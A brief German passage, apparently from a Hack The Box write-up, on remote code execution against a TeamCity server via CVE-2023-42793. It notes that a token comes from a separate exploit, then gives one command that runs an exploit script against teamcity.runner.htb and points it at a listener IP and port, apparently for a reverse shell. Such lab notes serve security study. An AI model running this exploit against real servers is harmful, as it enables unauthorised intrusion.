
TeamCity RCE für Linux (CVE-2023-42793)
Sie müssen zuerst den Token mithilfe eines anderen Exploits erhalten. Der folgende Exploit ermöglicht Ihnen jedoch RCE auf dem Linux-Server, da er die Nutzlast in der URL codiert und an den Server sendet.
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT